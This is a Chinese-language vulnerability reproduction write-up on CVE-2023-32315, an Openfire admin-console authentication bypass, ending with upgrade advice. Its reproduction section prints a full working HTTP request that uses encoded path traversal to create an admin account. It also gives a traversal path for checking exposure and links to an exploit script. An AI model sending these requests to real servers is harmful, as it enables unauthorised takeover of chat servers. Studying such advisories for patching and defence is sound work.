该漏洞为我团队漏洞监测平台发现,仅供学习参考使用,请勿用作违法用途,否则后果自负。
0x01 漏洞概述
漏洞编号:CVE-2023-32315
近日,我团队漏洞平台监测到Openfire 身份认证绕过漏洞(CVE-2023-32315),由于Openfire的路径名限制不恰当,未经身份认证的远程攻击者可以构造恶意请求利用该漏洞,成功利用此漏洞可以绕过身份认证登录管理界面。
Openfire是免费的、开源的、基于可拓展通讯和表示协议(XMPP)、采用Java编程语言开发的实时协作服务器。Openfire安装和使用都非常简单,并利用Web进行管理。单台服务器甚至可支持上万并发用户。
0x02 影响版本
0x03 漏洞复现
Openfire管理后台中曾经爆出一个CVE-2008-6508漏洞,该漏洞也是一个路径穿越漏洞。从该漏洞起Openfire已经加强了后台关于路径穿越问题的防护。引入了对UTF-16字符支持的非标准URL,而前面的防护策略并没有考虑到这一点。
方式一:BP方式复现
进入到Openfire的登陆页面。
BP抓包,发送如下数据包,并构造Payload,获取JSESSIONID和CSRFTOKEN。
GET /setup/setup-/%u002e%u002e/%u002e%u002e/user-create.jsp?csrf=csrftoken&username=hack&name=&email=&password=hack&passwordConfirm=hack&isadmin=on&create=Create+User HTTP/1.1 Host: localhost:9090 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36 Connection: close Cache-Control: max-age=0 Cookie: csrf=csrftoken
这个请求的响应包中包含异常,但实际上新用户已经被创建,账号密码均为hack。
然后我们直接使用新创建的用户登录后台。
到此漏洞我们就复现成功了。
方式二:手动复现
/setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp
出现这种情况证明漏洞存在。
0x04 漏洞利用
Exp脚本:https://github.com/tangxiaofeng7/CVE-2023-32315-Openfire-Bypass
0x05 整改意见
升级版本至4.6.8或4.7.5及以上。
原文始发于微信公众号(小白嘿课):CVE-2023-32315 Openfire管理后台身份认证绕过漏洞复现以及Exp
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论